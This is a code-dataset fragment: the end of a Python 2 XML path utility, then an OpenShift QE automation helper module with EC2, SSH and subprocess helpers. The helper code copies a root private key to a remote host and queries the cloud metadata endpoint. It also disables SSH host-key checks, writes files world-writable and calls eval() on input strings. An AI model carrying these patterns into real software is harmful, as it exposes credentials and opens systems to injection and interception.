self.get_xml_dict()\n\t\tnodelist = path.split(\"/\")\n\t\tif not nodelist[0]: # remove leading empty string, if present\n\t\t\tdel nodelist[0]\n\t\tfor nodename in nodelist[:-1]:\n\t\t\tdictval = xmldict.get(nodename, None)\n\t\t\tif dictval is None:\n\t\t\t\traise ValueError, \"XMLDocument.get_node: element not found: %s\" % nodename\n\t\t\tif type(dictval) is type(self.__dict__): # check for nested DictType\n\t\t\t\txmldict = dictval\n\t\t\telse:\n\t\t\t\traise ValueError, \"XMLDocument.get_node: Non-terminal node\"\n\t\ttry:\n\t\t\treturn xmldict[nodelist[-1]]\n\t\texcept KeyError:\n\t\t\traise ValueError, \"XMLDocument.get_node: element not found: %s\" % (nodelist[-1])\n\n\t\t\n\tdef set(self, path, value):\n\t\tnode= self.get_node(path)\n\t\tif hasattr(node, \"childNodes\"):\n\t\t\tif node.childNodes: \n\t\t\t\ttextnode = node.childNodes[0] # minidom has a strange API...\n\t\t\t\ttextnode.deleteData(0, textnode.length)\n\t\t\t\ttextnode.appendData(str(value))\n\t\t\telse: # no existing value node, so add one\n\t\t\t\tnode.appendChild(minidom.Text(str(value)))\n\t\t\tself.dirty = 1\n\t\telse:\n\t\t\traise ValueError, \"XMLDocument.set: invalid path\"\n\t\n\tdef dump_paths(self, fo):\n\t\tdef cb(node):\n\t\t\tfo.write(\"%s = %s\\n\" % (node2path(node), node2string(node)))\n\t\tnode_walker(self.document, cb)\n\t\t# XXX this needs work\n\n\n#########################################################\n# Utility functions\n#########################################################\n\ndef node2string(node):\n\tif node.nodeType == minidom.Node.ELEMENT_NODE:\n\t\tif node.hasAttributes():\n\t\t\ts = map(lambda i: \"@%s='%s'\" % (i[0],i[1]), node._get_attributes().items())\n\t\t\treturn \"%s[%s]\" % (node.tagName, \" and \".join(s))\n\t\telse:\n\t\t\treturn node.tagName\n\telif node.nodeType == minidom.Node.TEXT_NODE:\n\t\treturn str(node.data)\n\telif node.nodeType == minidom.Node.DOCUMENT_NODE:\n\t\treturn \"\" # the document is the root\n\telse:\n\t\treturn str(node)\n\n\ndef node_walker(startnode, callback, stoptype=minidom.Node.TEXT_NODE):\n\tfor node in startnode.childNodes:\n\t\tif node.nodeType == stoptype:\n\t\t\tcallback(node)\n\t\telif node.nodeType == minidom.Node.ELEMENT_NODE:\n\t\t\tnode_walker(node, callback, stoptype)\n\n\ndef node2path(node, choplevel=0):\n\ts = [node2string(node)]\n\twhile node.parentNode:\n\t\tnode = node.parentNode\n\t\ts.insert(0, node2string(node))\n\treturn \"/\".join(s[choplevel:])\n\t\n\n### internal helper functions\n\ndef _find_node_helper(node, name):\n\tellist = node.getElementsByTagName(name)\n\treturn ellist\n\ndef _getElementsByTagNameHelper(parent, name, rc):\n\tfor node in parent.childNodes:\n\t\tif node.nodeType == Node.ELEMENT_NODE and \\\n\t\t\t(name == \"*\" or node.tagName == name):\n\t\t\trc.append(node)\n\t\t_getElementsByTagNameHelper(node, name, rc)\n\treturn rc\n\n# recursive function to help build nested dictionaries\ndef _get_dict_helper(parent, name, dict):\n\tnewdict = {}\n\tfor node in parent.childNodes:\n\t\tif node.nodeType == minidom.Node.ELEMENT_NODE:\n\t\t\tnodename = node2string(node)\n\t\t\tnewdict[nodename] = node\n\t\t\t_get_dict_helper(node, nodename, newdict)\n\tif newdict:\n\t\tdict[name] = newdict\n\treturn dict\n\n\n\n# self test\nif __name__ == \"__main__\":\n\timport sys\n\targc = len(sys.argv)\n\tif argc < 2:\n\t\tprint \"\"\"xmltools <xmlfile> [<pathname>] [<newvalue>]\n\t\tif <xmlfile> given, print path names for file.\n\t\tif <pathname> also given, print value of that node.\n\t\tif <newvalue> also given, write new file with node changed to that value.\n\t\t\"\"\"\n\t\tsys.exit(1)\n\tdoc = XMLDocument(sys.argv[1])\n\tif argc == 2:\n\t\tdoc.dump_paths(sys.stdout)\n\telif argc == 3:\n\t\tnode = doc.get_node(sys.argv[2])\n\t\tprint node\n\telif argc >= 4:\n\t\tdoc.set(sys.argv[2], sys.argv[3])\n\t\tdoc.write_xmlfile()\n\n\n\n" }, { "alpha_fraction": 0.5870007276535034, "alphanum_fraction": 0.5934610366821289, "avg_line_length": 34.7899055480957, "blob_id": "2992cdcaae6f8a4121c5b058dded584e872875d9", "content_id": "843b9f76d1efd62794247b061afa957c07eb8f3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30494, "license_type": "no_license", "max_line_length": 357, "num_lines": 852, "path": "/automation/open/lib/helper.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport aws_console\nimport uuid\nimport subprocess\nimport commands\nimport os\nimport json\nimport re\nimport random\nimport string\nimport paramiko\nimport time\nimport sys\nimport signal\nimport clog\nimport base64\nfrom optparse import OptionParser\n\nexpress_conf_file = \"%s/.openshift/express.conf\" %(os.environ['HOME'])\nglobal_express_conf_file = \"/etc/openshift/express.conf\"\nCOMMAND_TIMEOUT=1200 #seconds to wait to kill never ending subprocesses\n\nlog = clog.get_logger()\nparser = OptionParser()\n\n\ndef get_default_rhlogin():\n if not os.getenv('OPENSHIFT_user_email') or not os.getenv('OPENSHIFT_user_passwd'):\n log.error(\"Please check these ENV var: OPENSHIFT_user_email OPENSHIFT_user_passwd\")\n raise Exception(\"Environment Variables OPENSHIFT_* Not Found.\")\n return (os.getenv('OPENSHIFT_user_email'), os.getenv('OPENSHIFT_user_passwd'))\n\n\n# helper function for to measure timedelta.\ndef timeit(method):\n def timed(*args, **kw):\n ts = time.time()\n result = method(*args, **kw)\n te = time.time()\n\n log.debug(\"%r (%r, %r) %2.2f sec\" % (method.__name__, args, kw, te-ts))\n return result\n\n return timed\n\nclass Alarm(Exception):\n pass\n\nclass TimeoutError(Exception):\n pass\n\nclass MercyException(Exception):\n pass\n\n\n@timeit\ndef create_node(instance_tag, image_name=None, image_size=\"m1.medium\"):\n aws_obj = aws_console.AWS_Console()\n if image_name == None:\n image_dict = aws_obj.get_all_devenv_images()\n target_image = image_dict[max(sorted(image_dict))]\n image_name = target_image.name.split('/')[1]\n if instance_tag == None:\n instance_tag=\"QE_auto_%s_%s\" %(image_name, uuid.uuid1().hex[:6])\n elif not instance_tag.startswith(\"QE_\"):\n instance_tag=\"QE_%s\" %(instance_tag)\n log.info(\"Instance tag: %s\"%instance_tag)\n log.info(\"Image size: %s\"%image_size)\n image = aws_obj.get_filtered_image(image_name)\n node = aws_obj.create_node(instance_tag, image, image_size)\n log.info(\"instance_ip=%s\" %(node.public_ip[0]))\n log.info(\"instance_name=%s\" %(instance_tag))\n return node.public_ip[0]\ncreate_broker=create_node #alias\n\n\ndef get_public_ip(private_ip):\n # curl http://169.254.169.254/latest/meta-data/local-ipv4\n ssh_options = \"-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \"\n cmd = \"scp %s %s root@%s: \"%(ssh_options, get_root_ssh_key_(), get_instance_ip())\n (ret, output) = cmd_get_status_output(cmd, quiet=True)\n if ret != 0:\n log.error(\"Unable to copy private key to broker\")\n return None\n\n key_name = get_root_ssh_key_().split('/')[-1]\n cmd = [\"curl -k -s -X GET http://169.254.169.254/latest/meta-data/public-ipv4 2>/dev/null\",\n \"rm -f %s\"%key_name]\n (ret, output) = rcmd_get_status_output2(\"ssh %s -i ./%s root@%s %s 2>/dev/null\"%(\n ssh_options,\n key_name, \n private_ip, \n \";\".join(cmd)))\n if ret==0:\n obj = re.search(\"([^\\s]+)$\",output)\n if obj:\n return obj.group(1)\n else:\n return None\n else:\n log.error(\"Unable to determine public IP address from %s\"%private_ip)\n return None\n\n\ndef get_internal_hostname(public_ip):\n pass\n\n\ndef get_private_ip(public_ip):\n \"\"\"\n Returns internal EC2 IP address by internal http request to 169.254.169.254\n \"\"\"\n cmd = \"curl -k -s -X GET http://169.254.169.254/latest/meta-data/local-ipv4 2>/dev/null\"\n private_ip=None\n (ret, output) = rcmd_get_status_output2(cmd, host=public_ip)\n if ret==0:\n obj = re.search(\"([^\\s]+)$\",output)\n if obj:\n private_ip = obj.group(1)\n\n if private_ip is None:\n log.error(\"Unable to determine private IP address from %s: %s\"%(public_ip,output))\n\n return private_ip\n\n\ndef add_node(instance_tag, image_name=None, image_size=\"m1.medium\", broker_ip=None):\n \"\"\"\n Node: Commands are copied from li/devenv script\n \"\"\"\n broker = {}\n if broker_ip is None:\n broker['internal_ip'] = get_private_ip(get_instance_ip())\n else:\n broker['internal_ip'] = get_private_ip(broker_ip)\n\n log.debug(\"Private broker's IP = %(internal_ip)s\"%broker)\n #modify the broker...\n log.debug(\"Modifying the broker\")\n ssh_cmd = [ \"sed -i 's,^plugin.qpid.host.ha.*=.*,plugin.qpid.host.ha=%(internal_ip)s,' /etc/mcollective/client.cfg\"%broker,\n \"sed -i 's,^plugin.qpid.host.ha.*=.*,plugin.qpid.host.ha=%(internal_ip)s,' /etc/mcollective/server.cfg\"%broker,\n \"sed -i 's,^ssl-cert-name.*=.*,ssl-cert-name=%(internal_ip)s,' /etc/qpidd.conf\"%broker,\n \"sed -i 's,^server_id.*=.*,server_id=%(internal_ip)s,' /etc/openshift/devenv/qpid/make-certs.sh\"%broker,\n \"sed -i 's,^owner_domain_name.*=.*,owner_domain_name=%(internal_ip)s,' /etc/openshift/devenv/qpid/make-certs.sh\"%broker,\n \"sed -i 's,^#-A,-A,' /etc/sysconfig/iptables\",\n \"sed -i 's,^BROKER_HOST.*=.*,BROKER_HOST=%(internal_ip)s,' /etc/openshift/node.conf\"%broker,\n \"cd /etc/openshift/devenv/qpid/\",\n \"./make-certs.sh\",\n \"/bin/cp test/client_db/* /etc/qpid/pki/client_db/; /bin/cp test/server_db/* /etc/qpid/pki/server_db/\",\n \"restorecon -R /etc/qpid/pki/\",\n \"chmod +r /etc/qpid/pki/client_db/* /etc/qpid/pki/server_db/*\",\n \"service iptables restart\",\n \"service activemq restart\",\n \"service mcollective restart\"]\n (ret, output) = rcmd_get_status_output(\" ; \".join(ssh_cmd), quiet=False)\n #ret = 1\n if ret != 0:\n log.error(\"Interrupted: Unable to modify broker for multi node setup.\")\n return 1\n #do setup for new node\n #new_node_public_ip = create_node(instance_tag, image_name, image_size)\n new_node_public_ip='23.20.68.196'\n log.debug(\"Modifying new node setup... of new %s\"%new_node_public_ip)\n ssh_options = \" -i %s -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \"%(get_root_ssh_key_())\n cmd_get_status_output('cd /tmp; rm -rf /tmp/test; scp %(opt)s -r root@%(broker)s:/etc/openshift/devenv/qpid/test/ .; scp %(opt)s -r test/client_db/* root@%(hostname)s:/etc/qpid/pki/client_db/; scp %(opt)s -r test/server_db/* root@%(hostname)s:/etc/qpid/pki/server_db/'%({'hostname': new_node_public_ip, 'opt': ssh_options, 'broker': get_instance_ip()}))\n cmd_get_status_output('cd /tmp; rm -rf /tmp/clients; scp %(opt)s -r root@%(broker)s:/etc/mcollective/ssl/clients/ .; scp %(opt)s -r clients/* root@%(hostname)s:/etc/mcollective/ssl/clients/'%({'hostname': new_node_public_ip, 'opt': ssh_options, 'broker': get_instance_ip()}))\n\n ssh_cmd = [\"sed -i 's,^plugin.qpid.host.ha.*=.*,plugin.qpid.host.ha=%(internal_ip)s,' /etc/mcollective/server.cfg\"%broker,\n \"restorecon -R /etc/qpid/pki/; chmod +r /etc/qpid/pki/client_db/* /etc/qpid/pki/server_db/*\",\n \"sed -i 's,^BROKER_HOST.*=.*,BROKER_HOST=%(internal_ip)s,' /etc/openshift/node.conf\"%broker,\n \"service activemq stop; service mcollective restart\"]\n (ret, output) = rcmd_get_status_output(\" ; \".join(ssh_cmd), host=new_node_public_ip)\n if ret == 0:\n rcmd_get_status_output('mco ping', quiet=False)\n return 0\n else:\n log.error(output)\n return 1\n\n@timeit\ndef shutdown_node(instance_name):\n aws_obj = aws_console.AWS_Console()\n print \"Shuting down: %s\" %(instance_name)\n aws_obj.stop_node(instance_name)\n\n\ndef append_file(fpath, content, flag='w+', mode=0777):\n #import stat\n fp = open(fpath, flag)\n fp.write(content)\n fp.close()\n os.chmod(fpath, mode) #, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)\n\n\ndef write_file(fpath, content, flag='w', mode=0777):\n #import stat\n fp = open(fpath, flag)\n fp.write(content)\n fp.close()\n os.chmod(fpath, mode) #stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)\n\n\ndef set_libra_server(instance_ip):\n \"\"\"\n Do setup :\n * environment variable $OPENSHIFT_libra_server\n * $HOME/.openshift/express.conf file with:\n libra_server=<instance_ip>\n\n This step should be executed only once at the begining,\n because all of the RHC command will use this value later.\n \"\"\"\n if instance_ip == 'int.openshift.redhat.com':\n run_mode = 'INT'\n elif instance_ip == 'stg.openshift.redhat.com':\n run_mode = 'STG'\n elif instance_ip == 'openshift.redhat.com':\n run_mode = 'PROD'\n elif instance_ip.find(\"example.com\") != -1 or instance_ip.find(\"test.com\") != -1 or instance_ip.find(\"broker\") != -1:\n run_mode = 'OnPremise'\n else:\n run_mode = 'DEV'\n\n os.putenv('OPENSHIFT_libra_server', instance_ip)\n (user, passwd) = get_default_rhlogin()\n fname = os.path.join(get_tmp_dir(),\"libra_server-%s\"%user)\n write_file(fname, instance_ip)\n log.info(\"Setting libra server to %s in %s\" %(instance_ip, express_conf_file))\n if not os.path.exists(express_conf_file):\n log.debug(\"Creating new config file in %s\"%express_conf_file)\n os.mkdir(os.path.dirname(express_conf_file))\n if run_mode == 'DEV':\n write_file(express_conf_file, \"libra_server=%s\\ninsecure=true\\n\" %(instance_ip))\n else:\n write_file(express_conf_file, \"libra_server=%s\\n\" % (instance_ip))\n else:\n cf = open(express_conf_file, 'r')\n output = cf.read()\n cf.close()\n output = re.sub(re.compile(r'^libra_server.*$', re.MULTILINE), \n \"libra_server='%s'\"%instance_ip, output)\n if not re.search('^libra_server=', output, re.MULTILINE):\n log.debug(\"Unable to find libra_server...appending new line...\")\n output = output.strip()\n output += \"\\nlibra_server='%s'\"%instance_ip\n if run_mode == 'DEV':\n if re.search('^insecure=', output, re.MULTILINE):\n output = re.sub(re.compile(r'^insecure.*$', re.MULTILINE), \n 'insecure=true', output)\n else:\n output += \"\\ninsecure=true\"\n else:\n match = re.search('^insecure=.*$', output, re.MULTILINE)\n if match:\n output = output[:match.start()] + output[match.end():]\n write_file(express_conf_file, output)\n\n\ndef get_instance_ip_by_tag(instance_tag):\n if instance_tag is None:\n raise Exception(\"ERROR: get_instance_ip_by_tag(): Missing/None argument.\")\n aws_obj = aws_console.AWS_Console()\n node = aws_obj.get_instance(instance_tag, True)\n return node.public_ip[0]\n\ndef get_instance_ip(instance_tag=None):\n \"\"\"\n If no instance_tag argument defined:\n Returns the IP address of libra server. Order of checking:\n - $OPENSHIFT_libra_server\n - ~/.openshift/express.conf\n - /etc/openshfit/express.conf\n\n Otherwise throws exception if none of above was found\n\n If instance_tag is defined, returns tries to get IP of running EC2 instance.\n \"\"\"\n if instance_tag is not None:\n return get_instance_ip_by_tag(instance_tag)\n (user, passwd) = get_default_rhlogin()\n tmp_file = os.path.join(get_tmp_dir(),\"libra_server-%s\" %(user))\n if os.getenv(\"OPENSHIFT_libra_server\"):\n return os.getenv(\"OPENSHIFT_libra_server\")\n elif os.path.exists(express_conf_file):\n c = open(express_conf_file).read()\n re_match_obj = re.search(\"^libra_server\\s*=[\\s']*([^\\s']+)\", c, re.M)\n if re_match_obj != None:\n ret_string = re_match_obj.group(1)\n #print \"Found libra_sever in %s: %s\" %(express_conf_file, ret_string)\n return ret_string\n else:\n raise Exception(\"Not found libra_server in %s !!!\" %(express_conf_file))\n elif os.path.exists(global_express_conf_file):\n c = open(global_express_conf_file).read()\n re_match_obj = re.search(r\"^libra_server\\s*=[\\s']*([^\\s']+)\", c, re.M)\n if re_match_obj != None:\n #print \"Found libra_sever in %s: %s\" %(global_express_conf_file, re_match_obj.group(1))\n return re_match_obj.group(1)\n else:\n raise Exception(\"Not found libra_server in %s !!!\" %(global_express_conf_file))\n elif os.path.exists(tmp_file):\n f = open(tmp_file, 'r')\n libra_ip = f.read()\n #print \"Found libra_sever in %s: %s\" %(tmp_file, libra_ip.strip())\n return libra_ip.strip()\n else:\n raise Exception(\"No libra sever specified !!!!\")\nget_broker_ip=get_instance_ip #alias\n\ndef extract_variants(arguments):\n variants = None\n\n if arguments is None:\n return variants\n\n try:\n if not re.match(r\"^{\", arguments) and (type(eval(arguments)) is dict) and ('VARIANTS' in eval(arguments).keys()):\n return eval(arguments)['VARIANTS']\n except:\n pass\n\n try:\n arguments = arguments.replace(\"'\",'\"') #necessary for JSON\n if not re.match(r\"^{\", arguments):\n json_args = json.loads(\" { \"+arguments+\" } \")\n else:\n json_args = json.loads(arguments)\n\n if (json_args.has_key('variants')):\n variants=json_args['variants']\n elif (json_args.has_key('VARIANTS')):\n variants=json_args['VARIANTS']\n elif (json_args.has_key('variant')):\n variants=json_args['variant']\n else:\n pass\n #print \"WARNING : UNABLE TO FIND VARIANTS field IN ARGUMENTS\"\n except Exception as e:\n log.warning(\"INVALID JSON FORMAT FOR ARGUMENTS.:%s\"%str(e))\n\n return variants\n\n\ndef get_domain_name_(user_email=None, user_passwd=None):\n \"\"\"\n Returns current openshift domain per given user.\n \"\"\"\n import openshift\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n li = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n try:\n status, response = li.domain_get()\n if (status == 'OK' or status == 'Not Found'):\n return response\n else:\n raise Exception(\"Unable to get domain name. status=%s, response=%s\"%(status, response))\n except openshift.OpenShiftNullDomainException:\n return None\n\n\ndef get_random_string(length = 10):\n return ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(0, length))\n\n\ndef get_default_ssh_key_():\n return os.getenv('HOME')+\"/.ssh/id_rsa\"\n\n\ndef rcmd_get_status_output(cmd, user='root', host=None, key_filename=None, quiet=True):\n \"\"\"\n Exec command under given user and retusn tuple: (ret_code, stdout)\n (host==None) => BROKER\n \"\"\"\n rhcsh_banners=[\n '[\\S\\s.\\n\\r\\b\\t]*WARNING: This ssh terminal was started without a tty[\\S\\s.\\n\\r\\b\\t]+ssh -t',\n '[\\S\\s.\\n\\r\\b\\t]*Welcome to OpenShift shell[\\S\\s.\\n\\r\\b\\t]+Type \"help\" for more info.']\n\n if (user == 'root'):\n if not host:\n host = get_instance_ip()\n if not key_filename:\n key_filename = get_root_ssh_key_()\n else:\n if host is None:\n raise Exception(\"Host is undefined. (rcmd_get_status_output())\")\n if not key_filename:\n key_filename = get_default_ssh_key_()\n\n remote_cmd = cmd\n if not quiet:\n print \"DEBUG[SSH]: remote host: %s; user: %s; ssh key: %s\" %(host, user, key_filename)\n print \"DEBUG[SSH]: remote cmd:%s\"%remote_cmd\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(host, username=user, key_filename=key_filename)\n chan = ssh.get_transport().open_session()\n chan.settimeout(COMMAND_TIMEOUT)\n chan.exec_command(remote_cmd)\n ret_code = chan.recv_exit_status() #wait for the end...\n chan.set_combine_stderr(True)\n stdout_data = []\n #stderr_data = []\n nbytes = 1024 #1kb buffer should be enough\n time.sleep(1) #let's wait for a while\n while chan.recv_ready():\n stdout_data.append(chan.recv(nbytes))\n sys.stderr.write('.')\n sys.stderr.flush()\n time.sleep(1) #let's wait for a while \n ret_output = \"\".join(stdout_data)\n '''\n time.sleep(1) #let's wait for a while\n while chan.recv_stderr_ready():\n stderr_data.append(chan.recv(nbytes))\n sys.stderr.write('_')\n sys.stderr.flush()\n time.sleep(1) #let's wait for a while \n stderr_data = \"\".join(stderr_data)\n '''\n chan.close()\n ssh.close()\n print \"DEBUG[SSH]: exit code:%s\"%ret_code\n\n #omit the rhcsh banners from the output\n if ('user' != 'root'):\n for ignore_pattern in rhcsh_banners:\n ret_output = re.sub(ignore_pattern,'',ret_output)\n ret_output = re.sub('^Pseudo-terminal will not.*$','',ret_output, re.MULTILINE)\n ret_output = re.sub('^Warning: Permanently added.*$','',ret_output, re.MULTILINE)\n\n if not quiet:\n #print \"[SSH]: output:%s\"%ret_output\n log.debug(\"[SSH]: output:%s\"%ret_output)\n return (ret_code, ret_output)\n\n\ndef cmd_get_status(command, timeout=COMMAND_TIMEOUT, quiet=False):\n #Method 1, can not kill all child process\n #print \"\"\"\\nRunning Command - %s\"\"\" %(command)\n #status = subprocess.call(command, timeout=timeout, shell=True)\n #print \"Command Return:\", status\n #return status\n \n #Method 2, can kill all child process, but no output can be seen when command hang there\n #return command_getstatusoutput(command, False, timeout)[0]\n\n #Best method\n if not quiet:\n print \"\"\"\\nRunning Command - %s\"\"\" %(command)\n obj = subprocess.Popen(command, shell=True)\n if timeout >= 0:\n signal.signal(signal.SIGALRM, _alarm_handler)\n signal.alarm(timeout)\n try:\n status = obj.wait()\n if not quiet:\n print \"Command Return:\", status\n return status\n except Alarm:\n if os.uname()[0] == 'Linux':\n child_process_list = get_child_process_list(str(obj.pid))\n if not quiet:\n print \"All child process belong to %s: %s\" %(obj.pid, child_process_list)\n signal.alarm(0)\n obj.terminate()\n time.sleep(2)\n obj.kill()\n time.sleep(2)\n try:\n os.killpg(obj.pid, signal.SIGTERM)\n os.killpg(obj.pid, signal.SIGKILL)\n except:\n pass\n #obj.wait()\n if os.uname()[0] == 'Linux':\n commands.getstatusoutput(\"kill -9 %s\" %(\" \".join(child_process_list)))\n raise TimeoutError(\"Timeout %s seconds for command `%s` has expired.\"%(timeout, command))\n finally:\n signal.alarm(0)\n\n\ndef cmd_get_status_output(command, quiet = False, timeout=COMMAND_TIMEOUT):\n if not quiet:\n print \"\"\"\\nRunning Command - %s\"\"\" %(command)\n\n output=\"\"\n obj = subprocess.Popen(command, stdin=open(os.devnull,'rb'), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)\n if timeout >= 0:\n signal.signal(signal.SIGALRM, _alarm_handler)\n signal.alarm(timeout)\n try:\n while obj.poll() == None:\n text = obj.stdout.readline()\n if not quiet:\n sys.stdout.write(\"%s\" %(text))\n sys.stdout.flush()\n output = output + text\n except Alarm:\n if os.uname()[0] == 'Linux':\n child_process_list = get_child_process_list(str(obj.pid))\n if not quiet:\n print \"All child process belong to %s: %s\" %(obj.pid, child_process_list)\n signal.alarm(0)\n obj.terminate()\n time.sleep(2)\n obj.kill()\n time.sleep(2)\n try:\n os.killpg(obj.pid, signal.SIGTERM)\n os.killpg(obj.pid, signal.SIGKILL)\n except:\n pass\n #obj.wait()\n if os.uname()[0] == 'Linux':\n commands.getstatusoutput(\"kill -9 %s\" %(\" \".join(child_process_list)))\n raise TimeoutError(\"Timeout %s seconds for command `%s` has expired.\"%(timeout,command))\n finally:\n signal.alarm(0)\n\n last_text = obj.stdout.read()\n if not quiet:\n sys.stdout.write(last_text)\n sys.stdout.flush()\n output = output + last_text\n #print \"-----\"\n #print output\n #print \"-----\"\n status = obj.poll()\n if not quiet:\n print \"Command Return:\", status\n return (status, output)\n\n\ndef remote_batch(cmd, user=\"root\", host=None, key_filename=None, quiet=True):\n \"\"\"\n Run remotely command and do scp of result.\n Returns status and output as if run locally.\n \"\"\"\n tmp_dump = get_random_string(10)+'.dump' #remote stdout\n tmp_code = \"%s.sh\"%get_random_string(10)\n if key_filename is None:\n if (user == 'root'):\n key_filename = get_root_ssh_key_()\n else:\n key_filename = get_default_ssh_key_()\n if host is None:\n host = get_instance_ip()\n ssh_options = \" -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i %s \"%key_filename\n try:\n fw = open(tmp_code, 'wb')\n fw.write(\"#!/bin/sh\\n\\n%s\"%cmd)\n fw.close()\n #SCP file to the host\n cmd = \"scp %s %s %s@%s:\"%(ssh_options, tmp_code, user, host)\n (status, output) = cmd_get_status_output(cmd, quiet=quiet)\n if status != 0:\n raise Exception(\"Unable to copy batch script to the remote host. %s\"%output)\n #RUN remotely\n cmd = \"sh ./%s >%s 2>&1\"%(tmp_code, tmp_dump)\n (status, output) = rcmd_get_status_output(cmd, user, host)\n #SCP results back\n cmd = \"scp %s %s@%s:%s ./\"%(ssh_options, user, host, tmp_dump)\n (_ret, _output) = cmd_get_status_output(cmd, quiet=quiet)\n if _ret != 0:\n raise Exception(\"ERROR: Unable to get dump file from broker\")\n\n output = open(tmp_dump.split('/')[-1], \"rb\").read()\n except Exception as e:\n log.error(\"Unable to open/parse file: %s\"%str(e))\n raise e\n finally:\n #CLEAN locally and remotely\n (ret, _output) = rcmd_get_status_output(\"rm -f %s %s\"%(tmp_dump,tmp_code), quiet=quiet)\n if os.path.exists(tmp_dump):\n os.remove(tmp_dump)\n\n return (status, output)\n\n\ndef rcmd_get_status_output2(cmd, user='root', host=None, key_filename=None, quiet=True):\n \"\"\"\n Run command under given user and retusn tuple: (ret_code, stdout)\n Via SSH not by paramiko, which is veeryyyy slow\n \"\"\"\n ssh_options = \" -t -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \"\n rhcsh_banners=[\n '[\\S\\s.\\n\\r\\b\\t]*WARNING: This ssh terminal was started without a tty[\\S\\s.\\n\\r\\b\\t]+ssh -t',\n '[\\S\\s.\\n\\r\\b\\t]*Welcome to OpenShift shell[\\S\\s.\\n\\r\\b\\t]+Type \"help\" for more info.']\n\n if (user == 'root'):\n if not host:\n host = get_instance_ip()\n if not key_filename:\n key_filename = get_root_ssh_key_()\n else:\n if host is None:\n raise Exception(\"Host is undefined. (rcmd_get_status_output())\")\n if not key_filename:\n key_filename = get_default_ssh_key_()\n\n remote_cmd = cmd\n if not quiet:\n print \"DEBUG[SSH]: remote host: %s; user: %s; ssh key: %s\" %(host, user, key_filename)\n print \"DEBUG[SSH]: remote cmd:%s\"%remote_cmd\n cmd = r\"stdbuf -o0 -i0 ssh %s -i %s %s@%s '%s'\"%(ssh_options, \n key_filename,\n user, \n host, \n remote_cmd)\n (ret_code, ret_output) = cmd_get_status_output(cmd, quiet=True)\n\n #omit the rhcsh banners from the output\n if (user != 'root'):\n for ignore_pattern in rhcsh_banners:\n ret_output = re.sub(ignore_pattern,'',ret_output)\n\n ret_output = re.sub('^Pseudo-terminal will not.*$','',ret_output, re.MULTILINE)\n ret_output = re.sub('^Warning: Permanently added.*$','',ret_output, re.MULTILINE)\n\n if not quiet:\n print \"DEBUG[SSH]: output:%s\"%ret_output\n return (ret_code, ret_output)\n\n\ndef get_root_ssh_key_():\n server_ip = get_instance_ip()\n etc_dir = get_etc_dir()\n if server_ip.find(\"example.com\") != -1 or server_ip.find(\"test.com\") != -1:\n ssh_key = etc_dir + '/onpremise/onpremise.pem'\n else:\n ssh_key = etc_dir + '/libra.pem'\n if not os.path.isfile(ssh_key):\n raise IOError(\"The %s file doesn't exist.\"%ssh_key)\n st = os.stat(ssh_key)\n #if not bool(st.st_mode & stat.S_IRUSR):\n os.chmod(ssh_key, 0400)\n\n return ssh_key\n\n\ndef _alarm_handler(signum, frame):\n raise Alarm\n\n\ndef get_lib_dir():\n return os.path.dirname(os.path.abspath(__file__))\n\n\ndef get_etc_dir():\n return os.path.abspath(get_lib_dir() + \"/../etc\")\n\n\ndef get_child_process_list(pid):\n # input: string or list\n # output: list\n if isinstance(pid, list):\n child_process_list = []\n for i in pid:\n (status, output) = cmd_get_status_output(\"pgrep -P %s\" %(i))\n if status == 0:\n tmp_list = output.split('\\n')\n #pid = pid + get_child_process_list(tmp_list)\n child_process_list = child_process_list + tmp_list\n child_process_list = child_process_list + get_child_process_list(tmp_list)\n else:\n pass\n #return pid\n return child_process_list\n elif isinstance(pid, str):\n return get_child_process_list([pid])\n else:\n print \"Neither string or list\"\n raise\n\n\ndef valid_cache(filename, expiration_hours=6):\n \"\"\" Returns True if mtime of file is not older than \n expiration_hours argument \"\"\"\n if not os.path.exists(filename):\n return False\n st = os.stat(filename)\n now = time.time()\n valid_period = expiration_hours*60*60\n #log.debug(\"%s > %s\"%(st.st_mtime, (now - valid_period)))\n if st.st_mtime > (now - valid_period):\n print \"[CACHE] %s FRESH\"%filename\n return True\n else:\n print \"[CACHE] %s EXPIRED\"%filename\n return False\n\n\ndef lock_file(filename):\n return os.open(filename, os.O_EXCL|os.O_RDWR)\n\n\ndef unlock_file(lock):\n lock.close()\n\n\ndef exclusive(func):\n \"\"\" Exclusive decorator \"\"\"\n def exclusived(*args, **kw):\n lockfile = \"%s/.\"%get_tmp_dir()+func.__name__+\".lock\" #waiting for lock\n sys.stderr.write(\"EXCL: Waiting for exclusive access[%s]\"%lockfile)\n sys.stderr.flush()\n oldumask = os.umask(0000)\n lock = lock_file(lockfile) #waiting for lock\n result = func(*args, **kw)\n unlock_file(lock)\n if os.path.exists(lockfile):\n os.unlink(lockfile)\n os.umask(oldumask)\n sys.stderr.write(\"EXCL: released[%s]\"%lockfile)\n sys.stderr.flush()\n return result\n\n return exclusived\n\n\ndef repeat_if_failure(func):\n \"\"\" Repeater decorator for MercyException handling \"\"\"\n def repeater(*args, **kw):\n result = None\n for attempt in range(2):\n try:\n result = func(*args, **kw)\n break\n except MercyException as e:\n log.warning(\"An attempt of %s failed (reason: %s).\"%(func.__name__,e))\n time.sleep(5)\n return result\n return repeater \n\n\ndef get_current_username():\n import getpass\n return getpass.getuser()\n\n\ndef get_homedir(user=None):\n if user is None:\n user = get_current_username()\n return os.path.expanduser('~%s'%user)\n \n\ndef get_tmp_dir():\n if sys.platform == 'win32':\n return os.getenv('TMP')\n else:\n return os.path.expanduser('~/tmp/')\n\n\ndef detect_os():\n \"\"\" Returns [String] of the operating system : \n ['FedoraXX', 'Debian', 'Ubuntu', 'RedHat' ] \"\"\"\n if os.path.isfile(\"/etc/debian_version\"):\n return 